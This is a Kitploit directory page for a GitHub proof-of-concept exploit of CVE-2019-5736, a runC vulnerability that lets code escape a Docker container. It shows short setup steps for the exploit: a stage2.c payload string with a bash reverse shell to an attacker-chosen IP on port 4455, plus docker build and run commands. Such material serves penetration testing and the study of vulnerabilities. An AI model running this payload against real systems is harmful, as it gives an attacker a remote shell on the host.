Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2019-5736-poc — Proof-of-concept exploit for CVE-2019-5736, demonstrating Docker container escape via runC vulnerability with reverse shell payload injection. | Kitploit
Tools/GitHubGitHub/h-wookie/cve-2019-5736-poc
Vulnerability AnalysisExploitationPenetration TestingContainer EscapeBinary Exploitation
GitHubh-wookie/cve-2019-5736-poc

cve-2019-5736-poc

Proof-of-concept exploit for CVE-2019-5736, demonstrating Docker container escape via runC vulnerability with reverse shell payload injection.

View Repository
36 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Headers to Add (stage2.c)

bash #include <string.h>

bash #include <unistd.h>

Modify to Attacker PC IP (stage2.c)

bash const char *poc = "#!/bin/bash\n/bin/bash -i >& /dev/tcp/<공격 PC IP>/4455 0>&1 &\n";

Create Docker Image and Container

root@kitploit:~
$ docker build -t cve .
$ docker run -t -d --name cvetest cve
$ sudo cp /usr/bin/docker-runc /usr/bin/docker-runc.bak 
Download Tool